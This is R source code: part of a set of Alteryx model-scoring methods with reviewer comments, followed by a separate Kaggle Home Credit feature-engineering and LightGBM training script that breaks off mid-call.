      score$fit <- exp(score$fit) * smear
      score$lwr <- exp(score$lwr) * smear
      score$upr <- exp(score$upr) * smear
    }
    # Build "<score.field>_fit/_lwr/_upr" names directly; the original built
    # and eval(parse())-ed a data.frame() call, which was fragile (broke for
    # non-syntactic score.field values) and an injection hazard.
    scores <- setNames(data.frame(score$fit, score$lwr, score$upr),
                       paste0(score.field, c("_fit", "_lwr", "_upr")))
  } else {
    score <- predict(mod.obj, newdata = new.data)
    if (log.y) {
      # Values above 709 would overflow exp() to Inf, which implies the target
      # was never log-transformed; warn and skip the correction in that case.
      if (max(score) > 709) {
        AlteryxRDataX::AlteryxMessage("The target variable does not appear to have been natural log transformed, no correction was applied.", iType = 2, iPriority = 3)
      } else {
        score <- exp(score) * smear
      }
    }
    scores <- setNames(data.frame(score), score.field)
  }
  scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxLogit <- function(mod.obj, new.data, score.field = "Score",
                               os.value = NULL, os.pct = NULL, ...) {
  # Align factor levels of the scoring data with those used in training.
  new.data <- matchLevels(new.data, mod.obj$xlevels)
  pred.prob <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "pred.prob")$pred.prob
  if (!is.null(os.value)) {
    # Undo oversampling: reweight the probability of the target level
    # (os.value) from its in-sample rate back to the population rate os.pct.
    target.value <- os.value
    num.target <- mod.obj$yinfo$counts[mod.obj$yinfo$levels == target.value]
    num.total <- sum(mod.obj$yinfo$counts)
    sample.pct <- 100*num.target / num.total
    wr <- sample.pct/os.pct
    wc <- (100 - sample.pct)/(100 - os.pct)
    # Compare only the FIRST level against the target, as scoreModel.rxDTree
    # does. The original compared the whole two-level vector inside `if`,
    # which warns on older R and errors on R >= 4.2.
    if (mod.obj$yinfo$levels[1] == target.value) {
      apr <- ((1 - pred.prob)/wr)/((1 - pred.prob)/wr + pred.prob/wc)
      scores <- data.frame(score1 = apr, score2 = 1 - apr)
    } else {
      adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
      scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
    }
  } else {
    scores <- data.frame(score1 = 1 - pred.prob, score2 = pred.prob)
  }
  # Build "<score.field>_<level>" names directly; the original round-tripped
  # through eval(parse(...)), which is fragile and an injection hazard.
  names(scores) <- paste0(score.field, "_", mod.obj$yinfo$levels[1:2])
  scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxGlm <- function(mod.obj, new.data, score.field = "Score", ...) {
  # rxPredict returns a data.frame; `$score` extracts the predictions as a
  # plain numeric vector.
  scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "score")$score
  # NOTE(review): `scores` is a vector here, so this names only its first
  # element (padding the rest with NA), and the method returns a vector rather
  # than the one-column data.frame the other methods return. Confirm whether
  # downstream code relies on this before changing it.
  names(scores) <- score.field
  scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxLinMod <- function(mod.obj, new.data, score.field = "Score", pred.int = FALSE, int.vals = NULL, log.y = FALSE, ...) {
  if (pred.int) {
    # Point prediction plus a prediction interval at the requested confidence
    # level (int.vals is a percentage, e.g. 95).
    scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, computeStdErrors = TRUE, interval = "prediction", confLevel = 0.01*int.vals, type = "response")
    # Drop the standard-error column, keeping fit/lwr/upr.
    scores <- scores[,-2]
    if (log.y)
      # Back-transform a log-scale target, applying the precomputed smearing
      # adjustment stored on the model to correct retransformation bias.
      for (i in 1:3)
        scores[,i] <- exp(scores[[i]])*mod.obj$smearing.adj
    names(scores) <- paste(score.field, "_", c("fit", "lwr", "upr"), sep = "")
  } else {
    scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "score")$score
    if (log.y) {
      # A missing smearing adjustment means the target was not log-transformed
      # when the model was built, so no back-transform is applied.
      # NOTE(review): "natrual" is a typo in the user-facing message; fixing it
      # would change runtime output, so it is left untouched here.
      if (is.null(mod.obj$smearing.adj)) {
        AlteryxRDataX::AlteryxMessage("The target variable does not appear to have been natrual log transformed, no correction was applied.", iType = 2, iPriority = 3)
      } else {
        scores <- exp(scores)*mod.obj$smearing.adj
      }
    }
  }
  scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxDTree <- function(mod.obj, new.data, score.field, os.value = NULL,
                               os.pct = NULL, ...) {
  # Align factor levels of the scoring data with those used in training.
  new.data <- matchLevels(new.data, mod.obj$xlevels)
  if (!is.null(mod.obj$yinfo)) {
    # Classification trees: one predicted-probability column per target level.
    scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "prob")
    # rxDForest output carries an extra trailing prediction column; drop it.
    # inherits() is used because class() can return a multi-element vector,
    # which makes a `==` comparison unreliable inside `if`.
    if (inherits(mod.obj, "rxDForest"))
      scores <- scores[, -(ncol(scores))]
    if (!is.null(os.value)) {
      if (ncol(scores) != 2) {
        AlteryxRDataX::AlteryxMessage("Adjusting for the oversampling of the target is only valid for a binary categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
      } else {
        # Undo oversampling: reweight the probability of the target level
        # (os.value) from its in-sample rate back to the population rate os.pct.
        target.value <- os.value
        target.loc <- 2
        if (mod.obj$yinfo$levels[1] == target.value) {
          target.loc <- 1
        }
        pred.prob <- scores[[target.loc]]
        num.target <- mod.obj$yinfo$counts[mod.obj$yinfo$levels == target.value]
        num.total <- sum(mod.obj$yinfo$counts)
        sample.pct <- 100*num.target / num.total
        wr <- sample.pct/os.pct
        wc <- (100 - sample.pct)/(100 - os.pct)
        if (mod.obj$yinfo$levels[1] == target.value) {
          apr <- ((1 - pred.prob)/wr)/((1 - pred.prob)/wr + pred.prob/wc)
          scores <- data.frame(score1 = apr, score2 = 1 - apr)
        } else {
          adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
          scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
        }
      }
    }
    # NOTE(review): paste() with the default sep = " " yields names such as
    # "Score _ Yes", unlike the sep = "" used by other methods. Kept as-is
    # because column names are downstream interface -- confirm before changing.
    names(scores) <- paste(score.field, "_", mod.obj$yinfo$levels)
  } else { # Regression trees: a single column of predicted values.
    scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, predVarNames = "score")$score
  }
  scores
}
# rxDForest objects are scored with exactly the rxDTree logic (rxPredict
# accepts both), so the method is a direct alias.
#' @export
#' @rdname scoreModel
scoreModel.rxDForest <- scoreModel.rxDTree
#' @export
#' @rdname scoreModel
scoreModel.elnet <- function(mod.obj, new.data, score.field = "Score", ...) {
  # The score tool has already subsetted the incoming columns, but other
  # callers may not have: glmnet's predict() does not reorder columns itself,
  # so subset and order the predictors to match the training matrix.
  used_x_vars <- getXVars(mod.obj)
  new.data <- df2NumericMatrix(
    x = new.data,
    filtering_message = "Non-numeric variables are among the predictors. They are now being removed.",
    convertVectorToDataFrame = TRUE
  )
  # Fail with a single readable message listing every missing predictor. The
  # original passed the whole character vector through paste0(), producing one
  # message fragment per missing variable instead of one message.
  missing_x_vars <- setdiff(used_x_vars, colnames(new.data))
  if (length(missing_x_vars) > 0) {
    if (length(missing_x_vars) == 1) {
      msg <- paste0("The incoming data stream is missing the variable ",
                    missing_x_vars,
                    ". Please make sure you provide this variable and try again.")
    } else {
      msg <- paste0("The incoming data stream is missing the variables ",
                    paste(missing_x_vars, collapse = ", "),
                    ". Please make sure you provide these variables and try again.")
    }
    AlteryxPredictive::stop.Alteryx2(msg)
  }
  # drop = FALSE keeps a single-predictor model as a matrix, as predict() needs.
  used_data <- new.data[, used_x_vars, drop = FALSE]
  requireNamespace('glmnet')
  score <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred)
  score <- as.data.frame(score)
  names(score) <- score.field
  return(score)
}
#' @export
#' @rdname scoreModel
scoreModel.lognet <- function(mod.obj, new.data, score.field = "Score",
                              os.value = NULL, os.pct = NULL, ...) {
  # Subset/order predictors to match the training matrix; glmnet's predict()
  # does not reorder columns itself.
  used_x_vars <- getXVars(mod.obj)
  new.data <- df2NumericMatrix(
    x = new.data,
    filtering_message = "Non-numeric variables are among the predictors. They are now being removed.",
    convertVectorToDataFrame = TRUE
  )
  target.value <- os.value
  y.levels <- getYlevels(mod.obj)
  # Fail with one readable message listing every missing predictor (the
  # original paste0() call produced one fragment per missing variable).
  missing_x_vars <- setdiff(used_x_vars, colnames(new.data))
  if (length(missing_x_vars) > 0) {
    if (length(missing_x_vars) == 1) {
      msg <- paste0("The incoming data stream is missing the variable ",
                    missing_x_vars,
                    ". Please make sure you provide this variable and try again.")
    } else {
      msg <- paste0("The incoming data stream is missing the variables ",
                    paste(missing_x_vars, collapse = ", "),
                    ". Please make sure you provide these variables and try again.")
    }
    AlteryxPredictive::stop.Alteryx2(msg)
  }
  # drop = FALSE keeps a single-predictor model as a matrix for predict().
  used_data <- new.data[, used_x_vars, drop = FALSE]
  requireNamespace('glmnet')
  if (!is.null(os.value)) {
    if (length(y.levels) != 2) {
      AlteryxMessage2("Adjusting for the oversampling of the target is only valid for a binary
                      categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
      scores <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
      # predict() returns only the probability of the second class; column one
      # is its complement.
      scores <- data.frame(cbind((1 - scores), scores))
    } else {
      # Undo oversampling: reweight the probability of os.value from its
      # in-sample rate back to the population rate os.pct.
      sample.pct <- samplePct(mod.obj, os.value, new.data)
      wr <- sample.pct/os.pct
      wc <- (100 - sample.pct)/(100 - os.pct)
      pred.prob <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
      pred.prob <- as.data.frame(cbind((1 - pred.prob), pred.prob))
      pred.prob <- pred.prob[ , (1:2)[y.levels == os.value]]
      adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
      if (y.levels[1] == target.value) {
        scores <- data.frame(score1 = adj.prob, score2 = 1 - adj.prob)
      } else {
        scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
      }
    }
  } else {
    scores <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
    scores <- data.frame(cbind((1 - scores), scores))
  }
  names(scores) <- paste(score.field, "_", y.levels, sep = "")
  return(scores)
}
#' @export
#' @rdname scoreModel
scoreModel.cv.glmnet <- function(mod.obj, new.data, score.field = "Score",
                                 os.value = NULL, os.pct = NULL, ...) {
  # Dispatch on the type of the underlying glmnet fit, forwarding the caller's
  # arguments. Previously score.field, os.value and os.pct were re-hard-coded
  # to their defaults here, so any values the caller supplied were discarded.
  if (inherits(mod.obj$glmnet.fit, 'lognet')) {
    scoreModel.lognet(mod.obj, new.data, score.field = score.field,
                      os.value = os.value, os.pct = os.pct, ...)
  } else {
    scoreModel.elnet(mod.obj, new.data, score.field = score.field, ...)
  }
}
#Note: When doing this for logistic regression, I'll need to update to differentiate between
#elnet and lognet types. I can test whether mod.obj$glmnet.fit inherits elnet.
|
library(magrittr)
library(lightgbm)
library(moments)
library(data.table)
library(recommenderlab)
library(tidyverse)
#---------------------------
cat("Loading data...\n")
# Local path to the Home Credit competition data (train/test application files).
data_dir = "C:\\Users\\Viacheslav_Pyrohov\\Desktop\\Kaggle_Homecredit competition"
tr <- read_csv(file.path(data_dir, "application_train.csv"))
te <- read_csv(file.path(data_dir, "application_test.csv"))
#---------------------------
cat("Preprocessing...\n")
# Bundle of summary statistics applied to every column when aggregating the
# auxiliary tables (one engineered feature per statistic per column).
# NOTE(review): funs() is deprecated in dplyr >= 0.8; a named list of lambdas
# is the modern equivalent -- left unchanged here.
fn <- funs(mean, sd, min, max, sum, n_distinct, .args = list(na.rm = TRUE))
# Exponential-decay rate for weighting historical records: chosen so a record
# 24 months old (MONTHS_BALANCE = -24) receives weight 0.5.
time_coef = log(0.5)/(-24) #apply weight coefficient to historical data, coef = 0.5 weight for 24 month ago
#---------------------------
cat("Preprocessing bureau_balance.csv...\n")
bbalance <- read_csv(file.path(data_dir, "bureau_balance.csv"))
# Aggregate the monthly credit-bureau status history to one row per
# SK_ID_BUREAU: numeric STATUS, a time-decayed STATUS, and the first/last
# observed statuses, each summarised with the `fn` statistics bundle.
# IMPORTANT! This part has low gain at the moment - check showed that old algorythm gave sum gain of 0.03234, new - 0.0457
sum_bbalance <- bbalance %>%
  #to improve: treat warnings
  #to do: delete redundant variables
  #to do: to make sure that new approach works validate against the same number of features!
  filter(!STATUS %in% 'X') %>% #filter out STATUS == 'X' as this mean absense of data
  mutate(STATUS = if_else(STATUS == 'C', -1, as.numeric(STATUS)), #treat 'C' = closed as -1 #this returns warning, but the result is OK and validated
         # Exponentially down-weight older months (see time_coef above).
         STATUS_WEIGHTED = exp(time_coef*(MONTHS_BALANCE))*STATUS) %>%
  group_by(SK_ID_BUREAU) %>%
  # NOTE(review): dplyr::first()/last() take order_by as the second positional
  # argument -- confirm ordering by MONTHS_BALANCE is what is intended here.
  mutate(START_STATUS = first(STATUS, MONTHS_BALANCE),
         END_STATUS = last(STATUS, MONTHS_BALANCE)) %>%
  summarise_all(fn)
rm(bbalance); gc()
# old approach
# sum_bbalance <- bbalance %>%
#   mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
#   group_by(SK_ID_BUREAU) %>%
#   summarise_all(fn)
# rm(bbalance); gc()
#---------------------------
cat("Preprocessing bureau.csv...\n")
bureau <- read_csv(file.path(data_dir, "bureau.csv"))
bureau <- bureau %>% #to do: validate if this approach gives gain
mutate(CREDIT_ACTIVE_BOOL = if_else(CREDIT_ACTIVE == 'Active', 1, 0),
CREDIT_CLOSED_BOOL = if_else(CREDIT_ACTIVE == 'Closed', 1, 0),
CREDIT_SOLD_BOOL = if_else(CREDIT_ACTIVE %in% c('Sold','Bad debt'), 1, 0),
CREDIT_UNTYPICAL_CURRENCY = if_else(CREDIT_CURRENCY != 'currency 1', 1, 0)) %>% #old approach could be better - check
select(-c(CREDIT_ACTIVE, CREDIT_CURRENCY))
# table(sum_bureau_test$CREDIT_CURRENCY) #currently continue working on bureau data
sum_bureau <- bureau %>%
left_join(sum_bbalance, by = "SK_ID_BUREAU") %>%
select(-SK_ID_BUREAU) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
rm(bureau, sum_bbalance); gc()
#---------------------------
cat("Preprocessing credit_card_balance.csv...\n")
cc_balance <- read_csv(file.path(data_dir, "credit_card_balance.csv"))
sum_cc_balance <- cc_balance %>%
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_cc_balance <- cc_balance %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(cc_balance); gc()
#---------------------------
cat("Preprocessing installments_payments.csv...\n")
payments <- read_csv(file.path(data_dir, "installments_payments.csv"))
sum_payments <- payments %>%
select(-SK_ID_PREV) %>%
mutate(PAYMENT_PERC = AMT_PAYMENT / AMT_INSTALMENT,
PAYMENT_DIFF = AMT_INSTALMENT - AMT_PAYMENT,
DPD = DAYS_ENTRY_PAYMENT - DAYS_INSTALMENT,
DBD = DAYS_INSTALMENT - DAYS_ENTRY_PAYMENT,
DPD = ifelse(DPD > 0, DPD, 0),
DBD = ifelse(DBD > 0, DBD, 0)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_payments <- payments %>%
select(-SK_ID_CURR) %>%
mutate(PAYMENT_PERC = AMT_PAYMENT / AMT_INSTALMENT,
PAYMENT_DIFF = AMT_INSTALMENT - AMT_PAYMENT,
DPD = DAYS_ENTRY_PAYMENT - DAYS_INSTALMENT,
DBD = DAYS_INSTALMENT - DAYS_ENTRY_PAYMENT,
DPD = ifelse(DPD > 0, DPD, 0),
DBD = ifelse(DBD > 0, DBD, 0)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(payments); gc()
#---------------------------
cat("Preprocessing POS_CASH_balance.csv...\n")
pc_balance <- read_csv(file.path(data_dir, "POS_CASH_balance.csv"))
sum_pc_balance <- pc_balance %>%
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_pc_balance <- pc_balance %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(pc_balance); gc()
#---------------------------
cat("Preprocessing previous_application.csv...\n")
prev <- read_csv(file.path(data_dir, "previous_application.csv"))
sum_prev <- prev %>%
#left_join(agr_prev_cc_balance, by = "SK_ID_PREV") %>% #to do: check if gives gain
#left_join(agr_prev_payments, by = "SK_ID_PREV") %>% #to do: check if gives gain
#left_join(agr_prev_pc_balance, by = "SK_ID_PREV") %>% #to do: check if gives gain
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
mutate(DAYS_FIRST_DRAWING = ifelse(DAYS_FIRST_DRAWING == 365243, NA, DAYS_FIRST_DRAWING),
DAYS_FIRST_DUE = ifelse(DAYS_FIRST_DUE == 365243, NA, DAYS_FIRST_DUE),
DAYS_LAST_DUE_1ST_VERSION = ifelse(DAYS_LAST_DUE_1ST_VERSION == 365243, NA, DAYS_LAST_DUE_1ST_VERSION),
DAYS_LAST_DUE = ifelse(DAYS_LAST_DUE == 365243, NA, DAYS_LAST_DUE),
DAYS_TERMINATION = ifelse(DAYS_TERMINATION == 365243, NA, DAYS_TERMINATION),
APP_CREDIT_PERC = AMT_APPLICATION / AMT_CREDIT) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
rm(prev, agr_prev_cc_balance, agr_prev_payments, agr_prev_pc_balance); gc()
tri <- 1:nrow(tr)
y <- tr$TARGET
tr_te <- tr %>%
select(-TARGET) %>%
bind_rows(te) %>%
left_join(sum_bureau, by = "SK_ID_CURR") %>%
left_join(sum_cc_balance, by = "SK_ID_CURR") %>%
left_join(sum_payments, by = "SK_ID_CURR") %>%
left_join(sum_pc_balance, by = "SK_ID_CURR") %>%
left_join(sum_prev, by = "SK_ID_CURR") %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
mutate(na = apply(., 1, function(x) sum(is.na(x))),
DAYS_EMPLOYED = ifelse(DAYS_EMPLOYED == 365243, NA, DAYS_EMPLOYED),
DAYS_EMPLOYED_PERC = sqrt(DAYS_EMPLOYED / DAYS_BIRTH),
INCOME_CREDIT_PERC = AMT_INCOME_TOTAL / AMT_CREDIT,
INCOME_PER_PERSON = log1p(AMT_INCOME_TOTAL / CNT_FAM_MEMBERS),
ANNUITY_INCOME_PERC = sqrt(AMT_ANNUITY / (1 + AMT_INCOME_TOTAL)),
LOAN_INCOME_RATIO = AMT_CREDIT / AMT_INCOME_TOTAL,
ANNUITY_LENGTH = AMT_CREDIT / AMT_ANNUITY,
CHILDREN_RATIO = CNT_CHILDREN / CNT_FAM_MEMBERS,
CREDIT_TO_GOODS_RATIO = AMT_CREDIT / AMT_GOODS_PRICE,
INC_PER_CHLD = AMT_INCOME_TOTAL / (1 + CNT_CHILDREN),
SOURCES_PROD = EXT_SOURCE_1 * EXT_SOURCE_2 * EXT_SOURCE_3,
CAR_TO_BIRTH_RATIO = OWN_CAR_AGE / DAYS_BIRTH,
CAR_TO_EMPLOY_RATIO = OWN_CAR_AGE / DAYS_EMPLOYED,
PHONE_TO_BIRTH_RATIO = DAYS_LAST_PHONE_CHANGE / DAYS_BIRTH,
PHONE_TO_EMPLOY_RATIO = DAYS_LAST_PHONE_CHANGE / DAYS_EMPLOYED
# add features from corr check loop
#AMT_DRAWINGS_OTHER_CURRENT_mean + DAYS_LAST_DUE_mean, # new corr = 0.086, diff = 0.059 #inefficient = 3.64E-04 on real data
#DAYS_LAST_DUE_mean + AMT_DRAWINGS_OTHER_CURRENT_sd, # new corr = 0.0856, diff = 0.0586 #inefficient = 4E-04 on real data
#CNT_DRAWINGS_OTHER_CURRENT_mean + CNT_INSTALMENT_MATURE_CUM_mean, # new corr = -0.084, diff = 0.0555 #inefficient = 1.66E-04 on real data
#AMT_PAYMENT_CURRENT_mean + DAYS_LAST_DUE_mean, # new corr = 0.08, diff = 0.05385 #inefficient = 0.00036 on real data
#AMT_CREDIT_SUM_max + RATE_INTEREST_PRIMARY_sd, # new corr = 0.31, check this carefully #inefficient on real data
#AMT_ANNUITY_min.y + RATE_INTEREST_PRIVILEGED_sd, # new corr = 0.13, check this carefully #inefficient on real data
#RATE_INTEREST_PRIMARY_NA = if_else(is.na(RATE_INTEREST_PRIMARY_mean) | is.nan(RATE_INTEREST_PRIMARY_mean), 0, 1), #added by intuition #inefficient on real data
#RATE_INTEREST_PRIVILEGED_NA = if_else(is.na(RATE_INTEREST_PRIVILEGED_mean) | is.nan(RATE_INTEREST_PRIVILEGED_mean), 0, 1) #added by intuition #inefficient on real data
) %>%
select(-one_of(drop_cols))
docs <- str_subset(names(tr), "FLAG_DOC")
live <- str_subset(names(tr), "(?!NFLAG_)(?!FLAG_DOC)(?!_FLAG_)FLAG_")
inc_by_org <- tr_te %>%
group_by(ORGANIZATION_TYPE) %>%
summarise(m = median(AMT_INCOME_TOTAL)) %$%
setNames(as.list(m), ORGANIZATION_TYPE)
rm(tr, te, fn, sum_bureau, sum_cc_balance,
sum_payments, sum_pc_balance, sum_prev); gc()
tr_te %<>%
mutate(DOC_IND_KURT = apply(tr_te[, docs], 1, moments::kurtosis),
LIVE_IND_SUM = apply(tr_te[, live], 1, sum),
NEW_INC_BY_ORG = dplyr::recode(tr_te$ORGANIZATION_TYPE, !!!inc_by_org),
NEW_EXT_SOURCES_MEAN = apply(tr_te[, c("EXT_SOURCE_1", "EXT_SOURCE_2", "EXT_SOURCE_3")], 1, mean),
NEW_SCORES_STD = apply(tr_te[, c("EXT_SOURCE_1", "EXT_SOURCE_2", "EXT_SOURCE_3")], 1, sd))%>%
mutate_all(funs(ifelse(is.nan(.), NA, .))) %>%
mutate_all(funs(ifelse(is.infinite(.), NA, .))) %>%
data.matrix()
#---------------------------
cat("Save & load dataset...\n")
save(tr_te, file = paste0(data_dir, "//Calculation//input_bigmatrix_short.RData"), version = NULL)
save(tri, file = paste0(data_dir, "//Calculation//input_tri.RData"), version = NULL)
save(y, file = paste0(data_dir, "//Calculation//input_y.RData"), version = NULL)
#load(file = paste0(data_dir, "//Calculation//input_bigmatrix_short.RData"), .GlobalEnv)
#load(file = paste0(data_dir, "//Calculation//input_tri.RData"), .GlobalEnv)
#load(file = paste0(data_dir, "//Calculation//input_y.RData"), .GlobalEnv)
gc()
#---------------------------
cat("Create additional variables...\n")
tr_te = as.data.table(tr_te); gc()
#
# # create vars for NaN observations
# # CONCLUSION: NAs already treated by na feature which is enough predicative
# #col_num = ncol(tr_te)
# #for (i in 3:col_num) {
# # colname = names(tr_te)[i]
# # tr_te[is.na(eval(as.name(colname)))|is.nan(eval(as.name(colname)))|is.null(eval(as.name(colname)))|is.infinite(eval(as.name(colname))),
# # paste0(colname, '_nulls') := 1]
# # #tr_te[is.na(eval(as.name(paste0(colname, '_nulls')))), paste0(colname, '_nulls') := 0]
# #}
#
# # outliers marking
# outliers_remove = function(dt,col_from,col_to) {
# for (i in col_from:col_to) {
# colname = names(dt)[i]
# qnt <- quantile(dt[,eval(as.name(colname))], probs=c(.25, .75), na.rm = T)
# H <- 1.5 * (qnt[2]-qnt[1])
# dt[eval(as.name(colname)) < (qnt[1] - H), paste0(colname, '_outliers') := -1]
# dt[eval(as.name(colname)) > (qnt[2] + H), paste0(colname, '_outliers') := 1]
# #dt[is.na(eval(as.name(paste0(colname, '_outliers')))), paste0(colname, '_outliers') := 0]
# }
# return(as.data.table(dt))
# }
#
# tr_te = outliers_remove(tr_te, col_from = 3, col_to = col_num)
# gc()
# apply random models
# IMPORTANT! It seems that this approach really works. Check file 2rand_cols...csv
vect_fla = c('y ~ CNT_PAYMENT_max + NAME_CONTRACT_STATUS_sum.y',
'y ~ REGION_RATING_CLIENT_W_CITY + AMT_APPLICATION_mean',
'y ~ DPD_n_distinct + LIVE_REGION_NOT_WORK_REGION + NAME_EDUCATION_TYPE',
'y ~ DAYS_INSTALMENT_min + NAME_INCOME_TYPE + CODE_REJECT_REASON_min',
'y ~ FLAG_DOCUMENT_7 + DAYS_ENTRY_PAYMENT_sd + FLAG_DOCUMENT_3',
'y ~ CREDIT_ACTIVE_BOOL_sum + DAYS_CREDIT_mean'
)
list_params = list(c('CNT_PAYMENT_max', 'NAME_CONTRACT_STATUS_sum.y'),
c('REGION_RATING_CLIENT_W_CITY', 'AMT_APPLICATION_mean'),
c('DPD_n_distinct', 'LIVE_REGION_NOT_WORK_REGION', 'NAME_EDUCATION_TYPE'),
c('DAYS_INSTALMENT_min', 'NAME_INCOME_TYPE', 'CODE_REJECT_REASON_min'),
c('FLAG_DOCUMENT_7', 'DAYS_ENTRY_PAYMENT_sd', 'FLAG_DOCUMENT_3'),
c('CREDIT_ACTIVE_BOOL_sum', 'DAYS_CREDIT_mean')
)
for (i in 1:length(vect_fla)) {
fla = vect_fla[i]
params = list_params[[i]]
# apply model
dt_mod = as.data.table(cbind(y, tr_te[1:length(y), params, with = FALSE]))
mod = lm(data=dt_mod, formula=as.formula(fla)) #to do: add random model here
tr_te[, paste0('newcol','_', sub('y ~ ', '', fla)) := predict(mod, tr_te[, params, with = FALSE])]
}
rm(fla, params, vect_fla, list_params, dt_mod, mod); gc()
# create matrix from dt without RAM issues
# original article with the method could be found here:
# https://medium.com/data-design/loading-super-large-sparse-data-when-you-cant-load-as-sparse-in-r-2a9f0ad927b2
temp_names = colnames(tr_te)
write_csv(as.data.frame(temp_names), path = paste0(data_dir, "//Calculation//input_colnames.csv"), col_names = TRUE)
write_csv(tr_te, path = paste0(data_dir, "//Calculation//input_bigmatrix.csv"), col_names = TRUE)
temp_names = read.csv(file = paste0(data_dir, "//Calculation//input_colnames.csv"))
rm(tr_te); gc()
n = 10 #set number of parts to split
for (i in 1:n) {
cat("Loading ", i, "th part.\n", sep = "")
train_data_temp <- fread(input = paste0(data_dir, "//Calculation//input_bigmatrix.csv"),
select = (1+round((i-1)*nrow(temp_names)/n, 0)):round(i*nrow(temp_names)/n, 0),
header = TRUE,
sep = ",",
stringsAsFactors = FALSE,
colClasses = rep("numeric", nrow(temp_names)),
data.table = TRUE)
gc(verbose = FALSE)
if (i > 1) {
cat("Coercing to matrix.\n", sep = "")
tr_te_temp <- as.matrix(train_data_temp)
rm(train_data_temp)
gc(verbose = FALSE)
cat("Coercing into dgCMatrix with NA as blank.\n", sep = "")
tr_te_temp <- dropNA(tr_te_temp)
gc(verbose = FALSE)
cat("Column binding the full matrix with the newly created matrix.\n", sep = "")
tr_te <- cbind(tr_te, tr_te_temp)
rm(tr_te_temp)
gc(verbose = FALSE)
} else {
cat("Coercing to matrix.\n", sep = "")
tr_te_temp <- as.matrix(train_data_temp)
rm(train_data_temp)
gc(verbose = FALSE)
cat("Coercing into dgCMatrix with NA as blank.\n", sep = "")
tr_te <- dropNA(tr_te_temp)
gc(verbose = FALSE)
}
}
gc()
#---------------------------
cat("Save & load long dataset...\n")
saveRDS(tr_te, file = paste0(data_dir, "//Calculation//input_bigmatrix_long.rds"))
#---------------------------
lgbm_feat = data.table(Feature = character(), Gain = numeric(), Cover = numeric(), Frequency = numeric())
lgbm_pred_list = list()
cat("Preparing data...\n")
for (i in 1:5) {
tr_te = readRDS(paste0(data_dir, "//Calculation//input_bigmatrix_long.rds"))
load(file = paste0(data_dir, "//Calculation//input_tri.RData"), .GlobalEnv)
load(file = paste0(data_dir, "//Calculation//input_y.RData"), .GlobalEnv)
#dtest <- lgb.Dataset(data = tr_te[-tri, ]) #it seems that this approach do not work for LightGBM. Raise questions for this.
dtest <- tr_te[-tri, ]
tr_te <- tr_te[tri, ]
tri <- caret::createDataPartition(y, p = 0.9, list = F) %>% c()
dtrain = lgb.Dataset(data = tr_te[tri, ], label = y[tri])
dval = lgb.Dataset(data = tr_te[-tri, ], label = y[-tri])
cols <- colnames(tr_te)
rm(tr_te, y, tri); gc()
#---------------------------
cat("Training model...\n")
# parameters taken from https://www.kaggle.com/dromosys/fork-of-fork-lightgbm-with-simple-features-cee847/code
#lgb.grid = list(objective = "binary",
# metric = "auc",
# #n_estimators=10000,
# learning_rate=0.02, # in source - 0.02
# num_leaves=32,
# colsample_bytree=0.9497036,
# subsample=0.8715623,
# max_depth=8,
# reg_alpha=0.04,
# reg_lambda=0.073,
# min_split_gain=0.0222415,
# min_child_weight=40,
# is_unbalance = TRUE)
lgb.grid = list(objective = "binary",
metric = "auc",
learning_rate=0.02, # in source - 0.02
num_leaves=127,
#colsample_bytree=0.9497036,
#subsample=0.8715623,
#max_depth=8,
#reg_alpha=0.04,
#reg_lambda=0.073,
#min_split_gain=0.0222415,
#min_child_weight=40,
feature_fraction = 0.6, #originaly 0.5
bagging_freq = 1,
bagging_fraction = 0.8,
use_missing = TRUE,
is_unbalance = TRUE)
m_gbm_cv = lgb.train(params = lgb.grid,
data = dtrain,
num_threads = 10,
nrounds = 5,
eval_freq = 20,
#boosting = 'dart', # todo: check the difference
#num_leaves = 255, # typical: 255, usually {15, 31, 63, 127, 255, 511, 1023, 2047, 4095}.
#eval = "binary_error", #can place own validation function here #unknown parameter
#categorical_feature = categoricals.vec,
num_iterations = 2000, #2000, equivalent of n_estimators
